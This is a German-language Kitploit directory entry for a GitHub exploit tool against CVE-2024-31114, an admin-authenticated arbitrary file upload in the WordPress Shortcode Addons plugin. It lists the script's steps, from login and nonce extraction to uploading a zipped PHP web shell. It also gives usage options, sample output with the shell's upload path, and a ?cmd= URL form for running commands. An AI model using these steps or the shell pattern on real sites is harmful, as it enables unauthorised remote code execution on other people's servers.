Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-31114 — Shortcode Addons <= 3.2.5 - Authentifiziert (Admin+) beliebiger Datei-Upload | Kitploit
Tools/GitHubGitHub/nxploited/cve-2024-31114
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed Teaming
GitHubnxploited/cve-2024-31114

CVE-2024-31114

Shortcode Addons <= 3.2.5 - Authentifiziert (Admin+) beliebiger Datei-Upload

Repository anzeigen
2vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-31114 - WordPress Shortcode Addons RCE Exploit

Shortcode Addons <= 3.2.5 – Authentifizierter (Admin+) Upload beliebiger Dateien
CVE-ID: CVE-2024-31114
CVSS-Score: 9.1 (Kritisch)


🛠️ Schwachstellenbeschreibung

Das Shortcode Addons – with Visual Composer, Divi, Beaver Builder, and Elementor Extension-Plugin für WordPress ist aufgrund fehlender Dateityp-Validierung in allen Versionen bis einschließlich 3.2.5 anfällig für das Hochladen beliebiger Dateien.

Diese Schwachstelle ermöglicht es authentifizierten Angreifern mit Administratorzugriff oder höher, beliebige Dateien auf den Server hochzuladen – was zu Remote Code Execution (RCE) führen kann.


🚀 Skriptbeschreibung

Dieses Python-Skript automatisiert die Ausnutzung der Schwachstelle. Es führt Folgendes aus:

  1. Deaktivieren der SSL-Überprüfung
  2. Anmelden mit den angegebenen Anmeldeinformationen
  3. Extrahieren des CSRF-Tokens (_wpnonce)
  4. Erzeugen einer PHP-Shell (nxploit.php)
  5. Komprimieren und Hochladen als .zip
  6. Bestätigen des Uploads und Zugreifen auf die Shell
  7. Ausführen von whoami auf dem Zielserver

🧪 Verwendung

usage: CVE-2024-31114.py [-h] -u URL -un USERNAME -p PASSWORD

Shortcode Addons <= 3.2.5 - Authenticated (Admin+) Arbitrary File Upload
By: Nxploited | Khaled Alenazi

options:
  -h, --help            Show this help message and exit
  -u, --url URL         Target URL (e.g. http://target.com)
  -un, --username USERNAME   WordPress Admin Username
  -p, --password PASSWORD    WordPress Admin Password

📤 Beispielausgabe

[+] Authentication successful.
[+] _wpnonce extracted: 9d8dbbc630
[+] Payload nxploit.zip created.
[+] Payload uploaded.
[+] Shell is accessible at: http://target/wp-content/uploads/shortcode-addons/nxploit.php
[+] Command output:
------------------
www-data
------------------
[+] Temporary files removed.

🐚 Verwendung der Web-Shell

Sobald die Payload hochgeladen wurde, können Sie Systembefehle im folgenden Format ausführen:

http://target/wp-content/uploads/shortcode-addons/nxploit.php?cmd=command

🔹 Beispiel:

http://target/wp-content/uploads/shortcode-addons/nxploit.php?cmd=ls

Dies listet den Inhalt des aktuellen Verzeichnisses auf dem Server auf.

⚠️ Haftungsausschluss

Dieses Tool dient ausschließlich zu Schulungs- und autorisierten Testzwecken.
Der Autor ist nicht verantwortlich für Missbrauch oder Schäden, die durch dieses Skript verursacht werden.

Verwenden Sie es verantwortungsvoll und nur auf Systemen, für die Sie die ausdrückliche Erlaubnis zum Testen haben.


Von: Nxploited | Khaled Alenazi

Tool herunterladen